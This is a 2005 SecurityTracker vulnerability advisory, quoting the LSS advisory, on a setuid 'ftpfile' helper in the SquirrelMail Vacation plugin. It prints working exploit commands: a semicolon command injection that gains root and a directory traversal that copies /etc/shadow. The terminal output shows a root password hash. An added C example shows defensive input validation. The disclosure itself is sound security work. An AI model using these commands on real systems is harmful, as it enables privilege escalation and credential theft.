SecurityTracker.com
Category:   Application (E-mail Server)  >   Squirrelmail Vacation Plugin
Vendors:   SquirrelMail Development Team
Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID:  1012866
SecurityTracker URL:  http://securitytracker.com/id/1012866
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 13 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system

Version(s): 0.15
Description:   A vulnerability was reported in Squirrelmail in the vacation plugin. A local user can view arbitrary files and execute arbitrary commands.

LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is configured with set user id (setuid) root user privileges, does not properly validate user-supplied command line arguments before passing them to an execve() call. A demonstration exploit is provided:

ftpfile 0 root 0 get 0 "LSS-Security;id"

A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory. A demonstration exploit is provided:

ftpfile localhost root root get ../../../../etc/shadow ./shadow

Leon Juranic is credited with discovering this flaw.

The vendor has been notified without response.

The original advisory is available at:

http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03

Impact:   A local user can execute arbitrary commands with root privileges.

A local user can copy arbitrary files with root privileges.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.squirrelmail.org/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
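
A hardened argument check for a setuid copy helper of the kind described above, as an added example; it is not ftpfile's code or a vendor fix. The function names, the character allowlist and the /home/alice path are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Accept a single file name component: allowlisted characters only, so no
 * '/', no shell metacharacters; no "." or ".."; no leading '-' (options). */
int is_safe_component(const char *s)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t len = s ? strlen(s) : 0;

    if (len == 0 || len > 255 || s[0] == '-')
        return 0;
    if (strcmp(s, ".") == 0 || strcmp(s, "..") == 0)
        return 0;
    return strspn(s, ok) == len;
}

/* Fill argv for execve("/bin/cp", argv, envp): no shell ever parses the
 * strings and "--" ends option parsing. home is assumed to come from the
 * passwd database, never from the caller. Returns 0, or -1 on rejection. */
int build_copy_argv(const char *home, const char *src, const char *dst,
                    char *from, char *to, size_t n, char *argv[5])
{
    static char cp[] = "/bin/cp", end_opts[] = "--";

    if (!home || home[0] != '/' || !is_safe_component(src) || !is_safe_component(dst))
        return -1;
    int a = snprintf(from, n, "%s/%s", home, src);
    int b = snprintf(to, n, "%s/%s", home, dst);
    if (a < 0 || b < 0 || (size_t)a >= n || (size_t)b >= n)
        return -1;               /* truncated path: refuse, do not copy */
    argv[0] = cp; argv[1] = end_opts; argv[2] = from; argv[3] = to; argv[4] = NULL;
    return 0;
}

int request_ok(const char *home, const char *src, const char *dst)
{
    char from[4096], to[4096], *argv[5];
    return build_copy_argv(home, src, dst, from, to, sizeof from, argv) == 0;
}

int main(void)
{
    /* Constructed inputs: one ordinary name, then the two shapes from the advisory. */
    printf("%d %d %d\n", request_ok("/home/alice", ".forward", "forward.bak"),
           request_ok("/home/alice", "0", "LSS-Security;id"),
           request_ok("/home/alice", "../../../../etc/shadow", "shadow"));
    return 0;
}
```

Name validation does not stop a symlink inside the home directory from pointing elsewhere, so a helper like this should also drop to the target user's uid and gid before copying.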


 Source Message Contents

Subject:  Squirrelmail vacation v0.15 local root exploit



			LSS Security Advisory #LSS-2005-01-03
			       http://security.lss.hr

---

Title			:  Squirrelmail vacation v0.15 local root exploit 
Advisory ID		:  LSS-2005-01-03
Date			:  10.01.2005. 
Advisory URL		:  http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact			:  Privilege escalation and arbitrary file read
Risk level		:  High 
Vulnerability type	:  Local
Vendors contacted	:  No response from vendor


---



===[ Overview 

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of 
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz



===[ Vulnerability

Within the Squirrelmail Vacation plugin there is a suid root program 'ftpfile'.
The program is used to access local files in the user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. 
Command line arguments are passed to the execve() function without checking
for meta-characters, therefore making possible the execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ 

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$ 



===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.



===[ Fix

Not available yet.



===[ PoC Exploit

http://security.lss.hr/exploits/



===[ Credits

Credit for this vulnerability goes to Leon Juranic. 



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@LSS.hr
 Tel	: +385 1 6129 775
  



 
 



Copyright 2018, SecurityGlobal.net LLC